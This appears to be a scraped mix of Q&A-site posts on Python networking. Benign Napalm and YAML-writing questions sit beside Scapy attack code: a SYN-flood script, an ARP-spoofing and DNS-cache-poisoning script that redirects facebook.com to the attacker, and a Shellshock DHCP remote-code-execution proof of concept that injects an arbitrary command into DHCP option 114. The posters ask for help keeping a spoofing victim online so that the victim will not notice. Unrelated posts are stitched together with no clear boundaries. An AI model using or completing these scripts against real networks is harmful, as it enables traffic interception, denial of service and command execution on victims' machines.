I'm using Napalm to change the hostname of many network devices. Since the config will be different for each device, I need the script to assign the proper config to each device based on it's IP address. This seems like a dictionary would work best.
devicelist = {'10.255.32.1': 'device1.cfg', '10.255.32.5': 'device2.cfg'}
I need help calling the key value in the script below for each IP address. I have highlighted the line of code where this is required.
from napalm import get_network_driver
devicelist = ['10.255.32.1',
'10.255.32.5'
]
for ip_address in devicelist:
print ("Connecting to " + str(ip_address))
driver = get_network_driver('ios')
iosv = driver(ip_address, 'admin', 'password')
iosv.open()
**iosv.load_merge_candidate(filename='device1.cfg')**
diffs = iosv.compare_config()
if len(diffs) > 0:
print(diffs)
iosv.commit_config()
else:
print('No changes required.')
iosv.discard_config()
iosv.close()
You are asking for a simple access by key on your dictionary, combined with a for loop over the dictionary which is automatically a for loop over the keys. Minimal example:
devicelist = {'10.255.32.1': 'device1.cfg', '10.255.32.5': 'device2.cfg'}
for ipAdress in devicelist:
print("This IP : {} maps to this name: {}".format(ipAdress, devicelist[ipAdress]))
Output:
This IP : 10.255.32.1 maps to this name: device1.cfg
This IP : 10.255.32.5 maps to this name: device2.cfg
I wrote a code to send a packet from my Kali Linux machine to my Windows PC but the packet doesn't show in Wireshark. There are no errors in the code and it sends the packets but they are not received.
Any one can help ?
#!/usr/bin/python
from scapy.all import *
def synflood(src,tgt,message):
for dport in range(1024,65535):
IPlayer = IP(src=src, dst=tgt)
TCPlayer = TCP(sport=4444, dport=dport)
RAWlayer = Raw(load=message)
pkt = IPlayer/TCPlayer
send(pkt)
source = input("src: ")
target = input("targert : ")
message = input(" load : ")
while True:
synflood(source,target,message)
Update: So i fixed the problem! i tried replacing the for statement by "dport = 80" and for the target IP i chose another dest IP than my pc aand it showed up in wireshark, that's how i realised that i should configure an internal VM network instead of the bridged one , and it worked
I want to poison dns cache of a machine. First I used arpspoof -i wlan0 -t target_ip -r gateway_ip
I know I could forward the traffic using sysctl -w net.ipv4.ip_forward=1, but then I wouldn't be able to modify dns packets since they are already forwarded.
I need to forward packets using Scapy. By only changing MAC addresses of the packets like in the code below, the forwarding doesn't work.
What I want is to achieve what sysctl -w net.ipv4.ip_forward=1 does, after poisoning DNS cache of the target.
I tried this:
from scapy.all import *
gateway_mac = "x:x:x:x:x:x"
target_ip = "192.168.43.97"
target_mac = "x:x:x:x:x:x"
local_ip = "192.168.43.132"
local_mac = "x:x:x:x:x:x"
def poisonDNS(packet):
if packet.haslayer(DNS):
if packet.haslayer(DNSRR):
qname = packet[DNS].qd.qname.decode('utf-8')
ancount = packet[DNS].ancount
dns_id = packet[DNS].id
rr = packet.getlayer(DNSRR)
for i in range(ancount):
rrname = rr[i].rrname.decode('utf-8')
rrtype = rr.get_field('type').i2repr(rr, rr.type)
rrdata = rr[i].rdata
if type(rrdata) == bytes:
rrdata = rrdata.decode("utf-8")
if 'facebook.com' in rrname and rrtype == 'A':
print("Poisoning target's DNS cache")
packet[DNS].an[i].rdata = '192.168.43.132'
packet.show()
print("Successfully poisoned target's DNS cache")
def forwardPacket(packet):
if packet.haslayer(Ether):
src_mac = packet[Ether].src
dst_mac = packet[Ether].dst
if src_mac == target_mac.lower() and dst_mac == local_mac.lower():
# Target --> Local ==> Local --> Gateway
packet[Ether].src = local_mac.lower()
packet[Ether].dst = gateway_mac.lower()
elif src_mac == gateway_mac.lower() and dst_mac == local_mac.lower():
# Gateway --> Local ==> Local --> Target
packet[Ether].src = local_mac.lower()
packet[Ether].dst = target_mac.lower()
sendp(packet)
def packet_callback(packet):
# Poison DNS
poisonDNS()
# Forward packets
forwardPacket(packet)
sniff(prn=packet_callback, store=0)
This doesn't work. The requests dont go through
What am I doing wrong? How can I forward the traffic in Scapy?
Currently I'm pasting multiple lines of names which loops through each line and writes into a file. This prompts me to paste values in which works.
However I would like to have another prompt for other values like IPs etc going through the same loop.
Probably something very simple but any help would be appreciated.
Thanks in advance.
subnet = input(('Paste the subnet mask: '))
quit = ''
for line in iter(input, quit):
with open('my_file.yml', 'a') as data_file:
data_file.write(" - host: " + line + "\n ip: " + ips + "\n subnet:
" + subnet)
You can do what you want without iter by using an infinite while that only breaks out when no input is entered. I could have also checked for no input with if not host, because empty strings return False (See: Truth Value Testing).
The file is only opened once. There no need to repeatedly open it each iteration.
I have used an f-string with the call to write(), but you can still use normal strings like you did.
subnet = input('Paste the subnet mask: ')
with open('my_file.yml', 'a') as data_file:
while True:
host = input('Enter host: ')
if host == '':
break
ips = input('Enter IPs: ')
if ips == '':
break
data_file.write(f' - host: {host}\n ip: {ips}\n subnet: {subnet}\n')
Contents of my_file.yml:
- host: localhost
ip: 192.168.0.5
subnet: 255.255.255.0
- host: anotherhost
ip: 192.168.1.1
subnet: 255.255.255.0
I'm performing a dhcp spoofing attack. First I run a dhcp starvation attack which depletes the ip pool of my router. Then I execute the dhcp spoofing code which assigns a fake ip to my victim device, when it tries to connect to the wireless router.
My problem is, after my victim device is assigned the fake ip it can no longer access the internet. In a real case scenario, if the victim gets disconnected from the internet, they will know something is wrong, also there's no point to a spoofing attack if I cannot see the victim's activity.
So, how do I connect my victim to the internet with the fake ip? yes i know the DHCP rouge server will act as the real server for the victim, but how exactly is the implementation supposed to be, since in my case the dhcp rouge server is my pc and not a router.
Here is the dhcp spoofing code taken from github.
#! /usr/bin/env python
#Based on the PoC from https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/
import binascii
import argparse
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
from scapy.all import *
parser = argparse.ArgumentParser(description='DHCPSock', epilog='Shock dem shells!')
parser.add_argument('-i', '--iface', type=str, required=True, help='Interface to use')
parser.add_argument('-c', '--cmd', type=str, help='Command to execute [default: "echo pwned"]')
args = parser.parse_args()
command = args.cmd or "echo 'pwned'"
if os.geteuid() != 0:
sys.exit("Run me as r00t")
#BOOTP
#siaddr = DHCP server ip
#yiaddr = ip offered to client
#xid = transaction id
#chaddr = clients mac address in binary format
def dhcp_offer(raw_mac, xid):
print "in dhcp_offer"
packet = (Ether(src=get_if_hwaddr(args.iface), dst='ff:ff:ff:ff:ff:ff') /
IP(src="192.168.0.105", dst='255.255.255.255') /
UDP(sport=67, dport=68) /
BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr='192.168.1.4', siaddr='192.168.0.105', xid=xid) /
DHCP(options=[("message-type", "offer"),
('server_id', '192.168.0.105'),
('subnet_mask', '255.255.255.0'),
('router', '192.168.0.105'),
('lease_time', 172800),
('renewal_time', 86400),
('rebinding_time', 138240),
"end"]))
#print packet.show()
return packet
def dhcp_ack(raw_mac, xid, command):
print "in dhcp_ack"
packet = (Ether(src=get_if_hwaddr(args.iface), dst='ff:ff:ff:ff:ff:ff') /
IP(src="192.168.0.105", dst='255.255.255.255') /
UDP(sport=67, dport=68) /
BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr='192.168.1.4', siaddr='192.168.0.105', xid=xid) /
DHCP(options=[("message-type", "ack"),
('server_id', '192.168.0.105'),
('subnet_mask', '255.255.255.0'),
('router', '192.168.0.105'),
('lease_time', 172800),
('renewal_time', 86400),
('rebinding_time', 138240),
(114, "() { ignored;}; " + command),
"end"]))
#print packet.show()
return packet
def dhcp(resp):
if resp.haslayer(DHCP):
mac_addr = resp[Ether].src
raw_mac = binascii.unhexlify(mac_addr.replace(":", ""))
if resp[DHCP].options[0][1] == 1:
xid = resp[BOOTP].xid
print "[*] Got dhcp DISCOVER from: " + mac_addr + " xid: " + hex(xid)
print "[*] Sending OFFER..."
packet = dhcp_offer(raw_mac, xid)
#packet.plot(lambda x:len(x))
#packet.pdfdump("test.pdf")
#print hexdump(packet)
#print packet.show()
sendp(packet, iface=args.iface)
if resp[DHCP].options[0][1] == 3:
xid = resp[BOOTP].xid
print "[*] Got dhcp REQUEST from: " + mac_addr + " xid: " + hex(xid)
print "[*] Sending ACK..."
packet = dhcp_ack(raw_mac, xid, command)
#print hexdump(packet)
#print packet.show()
sendp(packet, iface=args.iface)
print "[*] Waiting for a DISCOVER..."
sniff(filter="udp and (port 67 or 68)", prn=dhcp, iface=args.iface)
#sniff(filter="udp and (port 67 or 68)", prn=dhcp)